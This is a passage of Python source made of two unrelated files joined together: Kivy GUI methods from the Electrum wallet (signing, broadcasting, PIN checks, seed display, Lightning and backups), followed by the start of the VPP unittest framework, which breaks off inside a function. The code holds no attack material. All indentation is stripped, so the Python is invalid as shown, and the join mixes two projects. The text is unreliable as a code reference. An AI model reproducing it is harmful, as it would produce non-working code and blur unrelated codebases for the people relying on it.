tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
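# Runs on a worker thread: broadcast the transaction via the network and hand
# (status, message) back to the Kivy main thread.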
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
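# Gate an action behind user confirmation: ask for the PIN if one is configured,
# otherwise show a plain OK/Cancel question, then call f(*args, password).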
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def toggle_lightning(self):
if self.wallet.has_lightning():
if not bool(self.wallet.lnworker.channels):
warning = _('This will delete your lightning private keys')
d = Question(_('Disable Lightning?') + '\n\n' + warning, self._disable_lightning)
d.open()
else:
self.show_info('This wallet has channels')
else:
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
d = Question(_('Enable Lightning?') + '\n\n' + warning1 + '\n\n' + warning2, self._enable_lightning)
d.open()
def _enable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.init_lightning()
self.show_info(_('Lightning keys have been initialized.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def _disable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.remove_lightning()
self.show_info(_('Lightning keys have been removed.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.password = new_password
self.show_info(_("Your password was updated"))
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def change_pin_code(self, cb):
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
new_path = self.wallet.save_backup()
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
# framework.py
#!/usr/bin/env python3
from __future__ import print_function
import gc
import logging
import sys
import os
import select
import signal
import subprocess
import unittest
import tempfile
import time
import faulthandler
import random
import copy
import psutil
import platform
from collections import deque
from threading import Thread, Event
from inspect import getdoc, isclass
from traceback import format_exception
from logging import FileHandler, DEBUG, Formatter
import scapy.compat
from scapy.packet import Raw
import hook as hookmodule
from vpp_pg_interface import VppPGInterface
from vpp_sub_interface import VppSubInterface
from vpp_lo_interface import VppLoInterface
from vpp_bvi_interface import VppBviInterface
from vpp_papi_provider import VppPapiProvider
import vpp_papi
from vpp_papi.vpp_stats import VPPStats
from vpp_papi.vpp_transport_shmem import VppTransportShmemIOError
from log import RED, GREEN, YELLOW, double_line_delim, single_line_delim, \
get_logger, colorize
from vpp_object import VppObjectRegistry
from util import ppp, is_core_present
from scapy.layers.inet import IPerror, TCPerror, UDPerror, ICMPerror
from scapy.layers.inet6 import ICMPv6DestUnreach, ICMPv6EchoRequest
from scapy.layers.inet6 import ICMPv6EchoReply
logger = logging.getLogger(__name__)
# Set up an empty logger for the testcase that can be overridden as necessary
null_logger = logging.getLogger('VppTestCase')
null_logger.addHandler(logging.NullHandler())
PASS = 0
FAIL = 1
ERROR = 2
SKIP = 3
TEST_RUN = 4
class BoolEnvironmentVariable(object):
def __init__(self, env_var_name, default='n', true_values=None):
self.name = env_var_name
self.default = default
self.true_values = true_values if true_values is not None else \
("y", "yes", "1")
def __bool__(self):
return os.getenv(self.name, self.default).lower() in self.true_values
if sys.version_info[0] == 2:
__nonzero__ = __bool__
def __repr__(self):
return 'BoolEnvironmentVariable(%r, default=%r, true_values=%r)' % \
(self.name, self.default, self.true_values)
debug_framework = BoolEnvironmentVariable('TEST_DEBUG')
if debug_framework:
import debug_internal
"""
Test framework module.
The module provides a set of tools for constructing and running tests and
representing the results.
"""
class VppDiedError(Exception):
""" exception for reporting that the subprocess has died."""
signals_by_value = {v: k for k, v in signal.__dict__.items() if
k.startswith('SIG') and not k.startswith('SIG_')}
def __init__(self, rv=None, testcase=None, method_name=None):
self.rv = rv
self.signal_name = None
self.testcase = testcase
self.method_name = method_name
try:
self.signal_name = VppDiedError.signals_by_value[-rv]
except (KeyError, TypeError):
pass
if testcase is None and method_name is None:
in_msg = ''
else:
in_msg = 'running %s.%s ' % (testcase, method_name)
msg = "VPP subprocess died %sunexpectedly with return code: %d%s." % (
in_msg,
self.rv,
' [%s]' % (self.signal_name if
self.signal_name is not None else ''))
super(VppDiedError, self).__init__(msg)
class _PacketInfo(object):
"""Private class to create packet info object.
Help process information about the next packet.
Set variables to default values.
"""
#: Store the index of the packet.
index = -1
#: Store the index of the source packet generator interface of the packet.
src = -1
#: Store the index of the destination packet generator interface
#: of the packet.
dst = -1
#: Store expected ip version
ip = -1
#: Store expected upper protocol
proto = -1
#: Store the copy of the former packet.
data = None
def __eq__(self, other):
index = self.index == other.index
src = self.src == other.src
dst = self.dst == other.dst
data = self.data == other.data
return index and src and dst and data
def pump_output(testclass):
""" pump output from vpp stdout/stderr to proper queues """
stdout_fragment = ""
stderr_fragment = ""
while not testclass.pump_thread_stop_flag.is_set():
readable = select.select([testclass.vpp.stdout.fileno(),
testclass.vpp.stderr.fileno(),
testclass.pump_thread_wakeup_pipe[0]],
[], [])[0]
if testclass.vpp.stdout.fileno() in readable:
read = os.read(testclass.vpp.stdout.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stdout_fragment) > 0:
split[0] = "%s%s" % (stdout_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stdout_fragment = split[-1]
testclass.vpp_stdout_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.info(
"VPP STDOUT: %s" % line.rstrip("\n"))
if testclass.vpp.stderr.fileno() in readable:
read = os.read(testclass.vpp.stderr.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stderr_fragment) > 0:
split[0] = "%s%s" % (stderr_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stderr_fragment = split[-1]
testclass.vpp_stderr_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.error(
"VPP STDERR: %s" % line.rstrip("\n"))
# ignoring the dummy pipe here intentionally - the
# flag will take care of properly terminating the loop
def _is_skip_aarch64_set():
return BoolEnvironmentVariable('SKIP_AARCH64')
is_skip_aarch64_set = _is_skip_aarch64_set()
def _is_platform_aarch64():
return platform.machine() == 'aarch64'
is_platform_aarch64 = _is_platform_aarch64()
def _running_extended_tests():
return BoolEnvironmentVariable("EXTENDED_TESTS")
running_extended_tests = _running_extended_tests()
def _running_gcov_tests():
return BoolEnvironmentVariable("GCOV_TESTS")
running_gcov_tests = _running_gcov_tests()
class KeepAliveReporter(object):
"""
Singleton object which reports test start to parent process
"""
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
self._pipe = None
@property
def pipe(self):
return self._pipe
@pipe.setter
def pipe(self, pipe):
if self._pipe is not None:
raise Exception("Internal error - pipe should only be set once.")
self._pipe = pipe
def send_keep_alive(self, test, desc=None):
"""
Write current test tmpdir & desc to keep-alive pipe to signal liveness
"""
if self.pipe is None:
# if not running forked..
return
if isclass(test):
desc = '%s (%s)' % (desc, unittest.util.strclass(test))
else:
desc = test.id()
self.pipe.send((desc, test.vpp_bin, test.tempdir, test.vpp.pid))
class VppTestCase(unittest.TestCase):
"""This subclass is a base class for VPP test cases that are implemented as
classes. It provides methods to create and run test case.
"""
extra_vpp_punt_config = []
extra_vpp_plugin_config = []
logger = null_logger
vapi_response_timeout = 5
@property
def packet_infos(self):
"""List of packet infos"""
return self._packet_infos
@classmethod
def get_packet_count_for_if_idx(cls, dst_if_index):
"""Get the number of packet info for specified destination if index"""
if dst_if_index in cls._packet_count_for_dst_if_idx:
return cls._packet_count_for_dst_if_idx[dst_if_index]
else:
return 0
@classmethod
def force_solo(cls):
""" if the test case class is timing-sensitive - return true """
return False
@classmethod
def instance(cls):
"""Return the instance of this testcase"""
return cls.test_instance
@classmethod
def set_debug_flags(cls, d):
cls.gdbserver_port = 7777
cls.debug_core = False
cls.debug_gdb = False
cls.debug_gdbserver = False
cls.debug_all = False
if d is None:
return
dl = d.lower()
if dl == "core":
cls.debug_core = True
elif dl == "gdb" or dl == "gdb-all":
cls.debug_gdb = True
elif dl == "gdbserver" or dl == "gdbserver-all":
cls.debug_gdbserver = True
else:
raise Exception("Unrecognized DEBUG option: '%s'" % d)
if dl == "gdb-all" or dl == "gdbserver-all":
cls.debug_all = True
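# Pick a CPU for the main core: bucket CPUs by how many running vpp_main
# processes are pinned to them and choose randomly from the least-used bucket.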
@staticmethod
def get_least_used_cpu():
cpu_usage_list = [set(range(psutil.cpu_count()))]
vpp_processes = [p for p in psutil.process_iter(attrs=['pid', 'name'])
if 'vpp_main' == p.info['name']]
for vpp_process in vpp_processes:
for cpu_usage_set in cpu_usage_list:
try:
cpu_num = vpp_process.cpu_num()
if cpu_num in cpu_usage_set:
cpu_usage_set_index = cpu_usage_list.index(
cpu_usage_set)
if cpu_usage_set_index == len(cpu_usage_list) - 1:
cpu_usage_list.append({cpu_num})
else:
cpu_usage_list[cpu_usage_set_index + 1].add(
cpu_num)
cpu_usage_set.remove(cpu_num)
break
except psutil.NoSuchProcess:
pass
for cpu_usage_set in cpu_usage_list:
if len(cpu_usage_set) > 0:
min_usage_set = cpu_usage_set
break
return random.choice(tuple(min_usage_set))
@classmethod
def setUpConstants(cls):
""" Set-up the test case class based on environment variables """
cls.step = BoolEnvironmentVariable('STEP')
d = os.getenv("DEBUG", None)
# inverted case to handle '' == True
c = os.getenv("CACHE_OUTPUT", "1")
cls.cache_vpp_output = False if c.lower() in ("n", "no", "0") else True
cls.set_debug_flags(d)
cls.vpp_bin = os.getenv('VPP_BIN', "vpp")
cls.plugin_path = os.getenv('VPP_PLUGIN_PATH')
cls.test_plugin_path = os.getenv('VPP_TEST_PLUGIN_PATH')
cls.extern_plugin_path = os.getenv('EXTERN_PLUGINS')
plugin_path = None
if cls.plugin_path is not None:
if cls.extern_plugin_path is not None:
plugin_path = "%s:%s" % (
cls.plugin_path, cls.extern_plugin_path)
else:
plugin_path = cls.plugin_path
elif cls.extern_plugin_path is not None:
plugin_path = cls.extern_plugin_path
debug_cli = ""
if cls.step or cls.debug_gdb or cls.debug_gdbserver:
debug_cli = "cli-listen localhost:5002"
coredump_size = None
size = os.getenv("COREDUMP_SIZE")
if size is not None:
coredump_size = "coredump-size %s" % size
if coredump_size is None:
coredump_size = "coredump-size unlimited"
cpu_core_number = cls.get_least_used_cpu()
if not hasattr(cls, "worker_config"):
cls.worker_config = ""
default_variant = os.getenv("VARIANT")
if default_variant is not None:
default_variant = "defaults { %s 100 }" % default_variant
else:
default_variant = ""
api_fuzzing = os.getenv("API_FUZZ")
if api_fuzzing is None:
api_fuzzing = 'off'
cls.vpp_cmdline = [cls.vpp_bin, "unix",
"{", "nodaemon", debug_cli, "full-coredump",
coredump_size, "runtime-dir", cls.tempdir, "}",
"api-trace", "{", "on", "}", "api-segment", "{",
"prefix", cls.shm_prefix, "}", "cpu", "{",
"main-core", str(cpu_core_number),
cls.worker_config, "}",
"physmem", "{", "max-size", "32m", "}",
"statseg", "{", "socket-name", cls.stats_sock, "}",
"socksvr", "{", "socket-name", cls.api_sock, "}",
"node { ", default_variant, "}",
"api-fuzz {", api_fuzzing, "}",
"plugins",
"{", "plugin", "dpdk_plugin.so", "{", "disable",
"}", "plugin", "rdma_plugin.so", "{", "disable",
"}", "plugin", "lisp_unittest_plugin.so", "{",
"enable",
"}", "plugin", "unittest_plugin.so", "{", "enable",
"}"] + cls.extra_vpp_plugin_config + ["}", ]
if cls.extra_vpp_punt_config is not None:
cls.vpp_cmdline.extend(cls.extra_vpp_punt_config)
if plugin_path is not None:
cls.vpp_cmdline.extend(["plugin_path", plugin_path])
if cls.test_plugin_path is not None:
cls.vpp_cmdline.extend(["test_plugin_path", cls.test_plugin_path])
cls.logger.info("vpp_cmdline args: %s" % cls.vpp_cmdline)
cls.logger.info("vpp_cmdline: %s" % " ".join(cls.vpp_cmdline))
@classmethod
def wait_for_enter(cls):
if cls.debug_gdbserver:
print(double_line_delim)
print("Spawned GDB server with PID: %d" % cls.vpp.pid)
elif cls.debug_gdb:
print(double_line_delim)
print("Spawned VPP with PID: %d" % cls.vpp.pid)
else:
cls.logger.debug("Spawned VPP with PID: %d" % cls.vpp.pid)
return
print(single_line_delim)
print("You can debug VPP using:")
if cls.debug_gdbserver:
print("sudo gdb " + cls.vpp_bin +
" -ex 'target remote localhost:{port}'"
.format(port=cls.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume VPP from "
"within gdb by issuing the 'continue' command")
cls.gdbserver_port += 1
elif cls.debug_gdb:
print("sudo gdb " + cls.vpp_bin + " -ex 'attach %s'" % cls.vpp.pid)
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume VPP from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
@classmethod
def run_vpp(cls):
cmdline = cls.vpp_cmdline
if cls.debug_gdbserver:
gdbserver = '/usr/bin/gdbserver'
if not os.path.isfile(gdbserver) or \
not os.access(gdbserver, os.X_OK):
raise Exception("gdbserver binary '%s' does not exist or is "
"not executable" % gdbserver)
cmdline = [gdbserver, 'localhost:{port}'
.format(port=cls.gdbserver_port)] + cls.vpp_cmdline
cls.logger.info("Gdbserver cmdline is %s", " ".join(cmdline))
try:
cls.vpp = subprocess.Popen(cmdline,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
cls.logger.critical("Subprocess returned with non-0 return code: ("
"%s)", e.returncode)
raise
except OSError as e:
cls.logger.critical("Subprocess returned with OS error: "
"(%s) %s", e.errno, e.strerror)
raise
except Exception as e:
cls.logger.exception("Subprocess returned unexpected from "
"%s:", cmdline)
raise
cls.wait_for_enter()
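# If a core file exists in the temp dir, wait (up to 60 seconds) for its size
# to stop growing so the coredump is not read while still being written.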
@classmethod
def wait_for_coredump(cls):
corefile = cls.tempdir + "/core"
if os.path.isfile(corefile):
cls.logger.error("Waiting for coredump to complete: %s", corefile)
curr_size = os.path.getsize(corefile)
deadline = time.time() + 60
ok = False
while time.time() < deadline:
cls.sleep(1)
size = curr_size
curr_size = os.path.getsize(corefile)
if size == curr_size:
ok = True
break
if not ok:
cls.logger.error("Timed out waiting for coredump to complete:"
" %s", corefile)
else:
cls.logger.error("Coredump complete: %s, size %d",
corefile, curr_size)
@classmethod
def setUpClass(cls):
"""
Perform class setup before running the testcase
Remove shared memory files, start vpp and connect the vpp-api
"""
super(VppTestCase, cls).setUpClass()
gc.collect() # run garbage collection first
cls.logger = get_logger(cls.__name__)
seed = os.environ["RND_SEED"]
random.seed(seed)
if hasattr(cls, 'parallel_handler'):
cls.logger.addHandler(cls.parallel_handler)
cls.logger.propagate = False
cls.tempdir = tempfile.mkdtemp(
prefix='vpp-unittest-%s-' % cls.__name__)
cls.stats_sock = "%s/stats.sock" % cls.tempdir
cls.api_sock = "%s/api.sock" % cls.tempdir
cls.file_handler = FileHandler("%s/log.txt" % cls.tempdir)
cls.file_handler.setFormatter(
Formatter(fmt='%(asctime)s,%(msecs)03d %(message)s',
datefmt="%H:%M:%S"))
cls.file_handler.setLevel(DEBUG)
cls.logger.addHandler(cls.file_handler)
cls.logger.debug("--- setUpClass() for %s called ---" %
cls.__name__)
cls.shm_prefix = os.path.basename(cls.tempdir)
os.chdir(cls.tempdir)
cls.logger.info("Temporary dir is %s, shm prefix is %s",
cls.tempdir, cls.shm_prefix)
cls.logger.debug("Random seed is %s" % seed)
cls.setUpConstants()
cls.reset_packet_infos()
cls._captures = []
cls.verbose = 0
cls.vpp_dead = False
cls.registry = VppObjectRegistry()
cls.vpp_startup_failed = False
cls.reporter = KeepAliveReporter()
# need to catch exceptions here because if we raise, then the cleanup
# doesn't get called and we might end up with a zombie vpp
try:
cls.run_vpp()
cls.reporter.send_keep_alive(cls, 'setUpClass')
VppTestResult.current_test_case_info = TestCaseInfo(
cls.logger, cls.tempdir, cls.vpp.pid, cls.vpp_bin)
cls.vpp_stdout_deque = deque()
cls.vpp_stderr_deque = deque()
cls.pump_thread_stop_flag = Event()
cls.pump_thread_wakeup_pipe = os.pipe()
cls.pump_thread = Thread(target=pump_output, args=(cls,))
cls.pump_thread.daemon = True
cls.pump_thread.start()
if cls.debug_gdb or cls.debug_gdbserver:
cls.vapi_response_timeout = 0
cls.vapi = VppPapiProvider(cls.shm_prefix, cls.shm_prefix, cls,
cls.vapi_response_timeout)
if cls.step:
hook = hookmodule.StepHook(cls)
else:
hook = hookmodule.PollHook(cls)
cls.vapi.register_hook(hook)
cls.statistics = VPPStats(socketname=cls.stats_sock)
try:
hook.poll_vpp()
except VppDiedError:
cls.vpp_startup_failed = True
cls.logger.critical(
"VPP died shortly after startup, check the"
" output to standard error for possible cause")
raise
try:
cls.vapi.connect()
except vpp_papi.VPPIOError as e:
cls.logger.debug("Exception connecting to vapi: %s" % e)
cls.vapi.disconnect()
if cls.debug_gdbserver:
print(colorize("You're running VPP inside gdbserver but "
"VPP-API connection failed, did you forget "
"to 'continue' VPP from within gdb?", RED))
raise
except vpp_papi.VPPRuntimeError as e:
cls.logger.debug("%s" % e)
cls.quit()
raise
except Exception as e:
cls.logger.debug("Exception connecting to VPP: %s" % e)
cls.quit()
raise
@classmethod
def _debug_quit(cls):
if (cls.debug_gdbserver or cls.debug_gdb):
try:
cls.vpp.poll()
if cls.vpp.returncode is None:
print()
print(double_line_delim)
print("VPP or GDB server is still running")
print(single_line_delim)
input("When done debugging, press ENTER to kill the "
"process and finish running the testcase...")
except AttributeError:
pass
@classmethod
def quit(cls):
"""
Disconnect vpp-api, kill vpp and cleanup shared memory files
"""
cls._debug_quit()
# first signal that we want to stop the pump thread, then wake it up
if hasattr(cls, 'pump_thread_stop_flag'):
cls.pump_thread_stop_flag.set()
if hasattr(cls, 'pump_thread_wakeup_pipe'):
os.write(cls.pump_thread_wakeup_pipe[1], b'ding dong wake up')
if hasattr(cls, 'pump_thread'):
cls.logger.debug("Waiting for pump thread to stop")
cls.pump_thread.join()
if hasattr(cls, 'vpp_stderr_reader_thread'):
cls.logger.debug("Waiting for stderr pump to stop")
cls.vpp_stderr_reader_thread.join()
if hasattr(cls, 'vpp'):
if hasattr(cls, 'vapi'):
cls.logger.debug(cls.vapi.vpp.get_stats())
cls.logger.debug("Disconnecting class vapi client on %s",
cls.__name__)
cls.vapi.disconnect()
cls.logger.debug("Deleting class vapi attribute on %s",
cls.__name__)
del cls.vapi
cls.vpp.poll()
if cls.vpp.returncode is None:
cls.wait_for_coredump()
cls.logger.debug("Sending TERM to vpp")
cls.vpp.terminate()
cls.logger.debug("Waiting for vpp to die")
cls.vpp.communicate()
cls.logger.debug("Deleting class vpp attribute on %s",
cls.__name__)
del cls.vpp
if cls.vpp_startup_failed:
stdout_log = cls.logger.info
stderr_log = cls.logger.critical
else:
stdout_log = cls.logger.info
stderr_log = cls.logger.info
if hasattr(cls, 'vpp_stdout_deque'):
stdout_log(single_line_delim)
stdout_log('VPP output to stdout while running %s:', cls.__name__)
stdout_log(single_line_delim)
vpp_output = "".join(cls.vpp_stdout_deque)
with open(cls.tempdir + '/vpp_stdout.txt', 'w') as f:
f.write(vpp_output)
stdout_log('\n%s', vpp_output)
stdout_log(single_line_delim)
if hasattr(cls, 'vpp_stderr_deque'):
stderr_log(single_line_delim)
stderr_log('VPP output to stderr while running %s:', cls.__name__)
stderr_log(single_line_delim)
vpp_output = "".join(cls.vpp_stderr_deque)
with open(cls.tempdir + '/vpp_stderr.txt', 'w') as f:
f.write(vpp_output)
stderr_log('\n%s', vpp_output)
stderr_log(single_line_delim)
@classmethod
def tearDownClass(cls):
""" Perform final cleanup after running all tests in this test-case """
cls.logger.debug("--- tearDownClass() for %s called ---" %
cls.__name__)
cls.reporter.send_keep_alive(cls, 'tearDownClass')
cls.quit()
cls.file_handler.close()
cls.reset_packet_infos()
if debug_framework:
debug_internal.on_tear_down_class(cls)
def show_commands_at_teardown(self):
""" Allow subclass specific teardown logging additions."""
self.logger.info("--- No test specific show commands provided. ---")
def tearDown(self):
""" Show various debug prints after each test """
self.logger.debug("--- tearDown() for %s.%s(%s) called ---" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
try:
if not self.vpp_dead:
self.logger.debug(self.vapi.cli("show trace max 1000"))
self.logger.info(self.vapi.ppcli("show interface"))
self.logger.info(self.vapi.ppcli("show hardware"))
self.logger.info(self.statistics.set_errors_str())
self.logger.info(self.vapi.ppcli("show run"))
self.logger.info(self.vapi.ppcli("show log"))
self.logger.info(self.vapi.ppcli("show bihash"))
self.logger.info("Logging testcase specific show commands.")
self.show_commands_at_teardown()
self.registry.remove_vpp_config(self.logger)
# Save/Dump VPP api trace log
m = self._testMethodName
api_trace = "vpp_api_trace.%s.%d.log" % (m, self.vpp.pid)
tmp_api_trace = "/tmp/%s" % api_trace
vpp_api_trace_log = "%s/%s" % (self.tempdir, api_trace)
self.logger.info(self.vapi.ppcli("api trace save %s" % api_trace))
self.logger.info("Moving %s to %s\n" % (tmp_api_trace,
vpp_api_trace_log))
os.rename(tmp_api_trace, vpp_api_trace_log)
self.logger.info(self.vapi.ppcli("api trace custom-dump %s" %
vpp_api_trace_log))
except VppTransportShmemIOError:
self.logger.debug("VppTransportShmemIOError: Vpp dead. "
"Cannot log show commands.")
self.vpp_dead = True
else:
self.registry.unregister_all(self.logger)
def setUp(self):
""" Clear trace before running each test"""
super(VppTestCase, self).setUp()
self.reporter.send_keep_alive(self)
if self.vpp_dead:
raise VppDiedError(rv=None, testcase=self.__class__.__name__,
method_name=self._testMethodName)
self.sleep(.1, "during setUp")
self.vpp_stdout_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vpp_stderr_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vapi.cli("clear trace")
# store the test instance inside the test class - so that objects
# holding the class can access instance methods (like assertEqual)
type(self).test_instance = self
@classmethod
def pg_enable_capture(cls, interfaces=None):
"""
Enable capture on packet-generator interfaces
:param interfaces: iterable interface indexes (if None,
use self.pg_interfaces)
"""
if interfaces is None:
interfaces = cls.pg_interfaces
for i in interfaces:
i.enable_capture()
@classmethod
def register_capture(cls, cap_name):
""" Register a capture in the testclass """
# add to the list of captures with current timestamp
cls._captures.append((time.time(), cap_name))
@classmethod
def get_vpp_time(cls):
# processes e.g. "Time now 2.190522, Wed, 11 Mar 2020 17:29:54 GMT"
# returns float("2.190522")
timestr = cls.vapi.cli('show clock')
head, sep, tail = timestr.partition(',')
head, sep, tail = head.partition('Time now')
return float(tail)
@classmethod
def sleep_on_vpp_time(cls, sec):
""" Sleep according to time in VPP world """
# On a busy system with many processes
# we might end up with VPP time being slower than real world
# So take that into account when waiting for VPP to do something
start_time = cls.get_vpp_time()
while cls.get_vpp_time() - start_time < sec:
cls.sleep(0.1)
@classmethod
def pg_start(cls):
""" Enable the PG, wait till it is done, then clean up """
cls.vapi.cli("trace add pg-input 1000")
cls.vapi.cli('packet-generator enable')
# PG, when starts, runs to completion -
# so let's avoid a race condition,
# and wait a little till it's done.
# Then clean it up - and then be gone.
deadline = time.time() + 300
while cls.vapi.cli('show packet-generator').find("Yes") != -1:
cls.sleep(0.01) # yield
if time.time() > deadline:
cls.logger.error("Timeout waiting for pg to stop")
break
for stamp, cap_name in cls._captures:
cls.vapi.cli('packet-generator delete %s' % cap_name)
cls._captures = []
@classmethod
def create_pg_interfaces(cls, interfaces, gso=0, gso_size=0):
"""
Create packet-generator interfaces.
:param interfaces: iterable indexes of the interfaces.
:returns: List of created interfaces.
"""
result = []
for i in interfaces:
intf = VppPGInterface(cls, i, gso, gso_size)
setattr(cls, intf.name, intf)
result.append(intf)
cls.pg_interfaces = result
return result
@classmethod
def create_loopback_interfaces(cls, count):
"""
Create loopback interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppLoInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.lo_interfaces = result
return result
@classmethod
def create_bvi_interfaces(cls, count):
"""
Create BVI interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppBviInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.bvi_interfaces = result
return result
@staticmethod
def extend_packet(packet, size, padding=' '):
"""
